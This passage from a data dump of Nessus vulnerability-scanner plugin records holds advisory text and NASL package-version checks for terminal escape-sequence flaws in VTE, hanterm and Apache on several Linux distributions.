= os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2003:071\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"hanterm-xf-2.0.5-5.AS21.1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"hanterm-xf\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-28T16:27:53", "description": "A vulnerability has been found and corrected in vte :\n\nThe vte_sequence_handler_window_manipulation function in vteseq.c in libvte (aka libvte9) in VTE 0.25.1 and earlier, as used in gnome-terminal, does not properly handle escape sequences, which allows remote attackers to execute arbitrary commands or obtain potentially sensitive information via a (1) window title or (2) icon title sequence. NOTE: this issue exists because of a CVE-2003-0070 regression (CVE-2010-2713).\n\nThe updated packages have been patched to correct this issue.", "cvss3": {}, "published": "2010-08-25T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : vte (MDVSA-2010:161)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0070", "CVE-2010-2713"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64vte-devel", "p-cpe:/a:mandriva:linux:lib64vte9", "p-cpe:/a:mandriva:linux:libvte-devel", "p-cpe:/a:mandriva:linux:libvte9", "p-cpe:/a:mandriva:linux:python-vte", "p-cpe:/a:mandriva:linux:vte", "cpe:/o:mandriva:linux:2009.1", "cpe:/o:mandriva:linux:2010.0", "cpe:/o:mandriva:linux:2010.1"], "id": "MANDRIVA_MDVSA-2010-161.NASL", "href": "https://www.tenable.com/plugins/nessus/48428", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2010:161. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48428);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-2713\");\n script_bugtraq_id(41716);\n script_xref(name:\"MDVSA\", value:\"2010:161\");\n\n script_name(english:\"Mandriva Linux Security Advisory : vte (MDVSA-2010:161)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been found and corrected in vte :\n\nThe vte_sequence_handler_window_manipulation function in vteseq.c in\nlibvte (aka libvte9) in VTE 0.25.1 and earlier, as used in\ngnome-terminal, does not properly handle escape sequences, which\nallows remote attackers to execute arbitrary commands or obtain\npotentially sensitive information via a (1) window title or (2) icon\ntitle sequence. NOTE: this issue exists because of a CVE-2003-0070\nregression (CVE-2010-2713).\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64vte-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64vte9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libvte-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libvte9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-vte\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:vte\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/08/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64vte-devel-0.20.1-1.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64vte9-0.20.1-1.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libvte-devel-0.20.1-1.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libvte9-0.20.1-1.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"python-vte-0.20.1-1.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"vte-0.20.1-1.1mdv2009.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2010.0\", cpu:\"x86_64\", reference:\"lib64vte-devel-0.22.2-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"x86_64\", reference:\"lib64vte9-0.22.2-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"i386\", reference:\"libvte-devel-0.22.2-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"i386\", reference:\"libvte9-0.22.2-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"python-vte-0.22.2-1.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"vte-0.22.2-1.1mdv2010.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64vte-devel-0.24.1-2.1mdv2010.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64vte9-0.24.1-2.1mdv2010.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libvte-devel-0.24.1-2.1mdv2010.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libvte9-0.24.1-2.1mdv2010.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"python-vte-0.24.1-2.1mdv2010.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"vte-0.24.1-2.1mdv2010.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:46:50", "description": "Janne Snabb discovered that applications using VTE, such as gnome-terminal, did not correctly filter window and icon title request escape codes. If a user were tricked into viewing specially crafted output in their terminal, a remote attacker could execute arbitrary commands with user privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2010-07-16T00:00:00", "type": "nessus", "title": "Ubuntu 9.04 / 9.10 / 10.04 LTS : vte vulnerability (USN-962-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0070", "CVE-2010-2713"], "modified": "2019-09-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libvte-common", "p-cpe:/a:canonical:ubuntu_linux:libvte-dev", "p-cpe:/a:canonical:ubuntu_linux:libvte-doc", "p-cpe:/a:canonical:ubuntu_linux:libvte9", "p-cpe:/a:canonical:ubuntu_linux:python-vte", "p-cpe:/a:canonical:ubuntu_linux:python-vte-dbg", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:9.04", "cpe:/o:canonical:ubuntu_linux:9.10"], "id": "UBUNTU_USN-962-1.NASL", "href": "https://www.tenable.com/plugins/nessus/47742", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-962-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(47742);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/09/19 12:54:26\");\n\n script_cve_id(\"CVE-2003-0070\", \"CVE-2010-2713\");\n script_xref(name:\"USN\", value:\"962-1\");\n\n script_name(english:\"Ubuntu 9.04 / 9.10 / 10.04 LTS : vte vulnerability (USN-962-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Janne Snabb discovered that applications using VTE, such as\ngnome-terminal, did not correctly filter window and icon title request\nescape codes. If a user were tricked into viewing specially crafted\noutput in their terminal, a remote attacker could execute arbitrary\ncommands with user privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/962-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libvte-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libvte-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libvte-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libvte9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python-vte\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python-vte-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/03/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2010-2019 Canonical, Inc. / NASL script (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(9\\.04|9\\.10|10\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 9.04 / 9.10 / 10.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libvte-common\", pkgver:\"0.20.0-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libvte-dev\", pkgver:\"0.20.0-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libvte-doc\", pkgver:\"0.20.0-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libvte9\", pkgver:\"1:0.20.0-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"python-vte\", pkgver:\"0.20.0-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"python-vte-dbg\", pkgver:\"0.20.0-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libvte-common\", pkgver:\"0.22.2-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libvte-dev\", pkgver:\"0.22.2-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libvte-doc\", pkgver:\"0.22.2-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libvte9\", pkgver:\"1:0.22.2-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"python-vte\", pkgver:\"0.22.2-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"python-vte-dbg\", pkgver:\"0.22.2-0ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libvte-common\", pkgver:\"0.23.5-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libvte-dev\", pkgver:\"0.23.5-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libvte-doc\", pkgver:\"0.23.5-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libvte9\", pkgver:\"1:0.23.5-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"python-vte\", pkgver:\"0.23.5-0ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"python-vte-dbg\", pkgver:\"0.23.5-0ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvte-common / libvte-dev / libvte-doc / libvte9 / python-vte / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-28T14:34:22", "description": "Updated Apache and mod_ssl packages that fix several minor security issues are now available for Red Hat Enterprise Linux.\n\nThe Apache HTTP server is a powerful, full-featured, efficient, and freely-available Web server.\n\nBen Laurie found a bug in the optional renegotiation code in mod_ssl which can cause cipher suite restrictions to be ignored. This is triggered if optional renegotiation is used (SSLOptions +OptRenegotiate) along with verification of client certificates and a change to the cipher suite over the renegotiation. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2003-0192 to this issue.\n\nApache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2003-0020 to this issue.\n\nIt is possible to get Apache 1.3 to get into an infinite loop handling internal redirects and nested subrequests. A patch for this issue adds a new LimitInternalRecursion directive.\n\nAll users of the Apache HTTP Web Server are advised to upgrade to the applicable errata packages, which contain back-ported fixes correcting these issues.\n\nAfter the errata packages are installed, restart the Web service by running the following command :\n\n/sbin/service httpd restart", "cvss3": {}, "published": "2004-07-06T00:00:00", "type": "nessus", "title": "RHEL 2.1 : apache (RHSA-2003:244)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2003-0192"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:apache", "p-cpe:/a:redhat:enterprise_linux:apache-devel", "p-cpe:/a:redhat:enterprise_linux:apache-manual", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "cpe:/o:redhat:enterprise_linux:2.1"], "id": "REDHAT-RHSA-2003-244.NASL", "href": "https://www.tenable.com/plugins/nessus/12412", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2003:244. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(12412);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0020\", \"CVE-2003-0192\");\n script_xref(name:\"RHSA\", value:\"2003:244\");\n\n script_name(english:\"RHEL 2.1 : apache (RHSA-2003:244)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated Apache and mod_ssl packages that fix several minor security\nissues are now available for Red Hat Enterprise Linux.\n\nThe Apache HTTP server is a powerful, full-featured, efficient, and\nfreely-available Web server.\n\nBen Laurie found a bug in the optional renegotiation code in mod_ssl\nwhich can cause cipher suite restrictions to be ignored. This is\ntriggered if optional renegotiation is used (SSLOptions\n+OptRenegotiate) along with verification of client certificates and a\nchange to the cipher suite over the renegotiation. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2003-0192 to this issue.\n\nApache does not filter terminal escape sequences from its error logs,\nwhich could make it easier for attackers to insert those sequences\ninto terminal emulators containing vulnerabilities related to escape\nsequences. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2003-0020 to this issue.\n\nIt is possible to get Apache 1.3 to get into an infinite loop handling\ninternal redirects and nested subrequests. A patch for this issue adds\na new LimitInternalRecursion directive.\n\nAll users of the Apache HTTP Web Server are advised to upgrade to the\napplicable errata packages, which contain back-ported fixes correcting\nthese issues.\n\nAfter the errata packages are installed, restart the Web service by\nrunning the following command :\n\n/sbin/service httpd restart\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0020\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0192\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.apacheweek.com/issues/03-07-11#security\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2003:244\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/03/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/09/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2003:244\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"apache-1.3.27-3\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"apache-devel-1.3.27-3\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"apache-manual-1.3.27-3\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"mod_ssl-2.8.12-3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache / apache-devel / apache-manual / mod_ssl\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-29T14:11:45", "description": "This update includes the latest stable release of Apache httpd 2.0, including a security fix for a memory leak in mod_ssl which can be triggered remotely (CVE-2004-0113), and a fix for escaping of error log output (CVE-2003-0020).\n\nThis update also includes an enhanced version of the mod_cgi module which fixes a long-standing bug in the handling of stderr output during CGI script execution.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2004-07-23T00:00:00", "type": "nessus", "title": "Fedora Core 1 : httpd-2.0.49-1.1 (2004-117)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2003-0020", "CVE-2004-0113"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:httpd", "p-cpe:/a:fedoraproject:fedora:httpd-debuginfo", "p-cpe:/a:fedoraproject:fedora:httpd-devel", "p-cpe:/a:fedoraproject:fedora:httpd-manual", "p-cpe:/a:fedoraproject:fedora:mod_ssl", "cpe:/o:fedoraproject:fedora_core:1"], "id": "FEDORA_2004-117.NASL", "href": "https://www.tenable.com/plugins/nessus/13696", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-117.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13696);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2004-117\");\n\n script_name(english:\"Fedora Core 1 : httpd-2.0.49-1.1 (2004-117)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update includes the latest stable release of Apache httpd 2.0,\nincluding a security fix for a memory leak in mod_ssl which can be\ntriggered remotely (CVE-2004-0113), and a fix for escaping of error\nlog output (CVE-2003-0020).\n\nThis update also includes an enhanced version of the mod_cgi module\nwhich fixes a long-standing bug in the handling of stderr output\nduring CGI script execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-May/000138.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a4075d66\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd\");\n 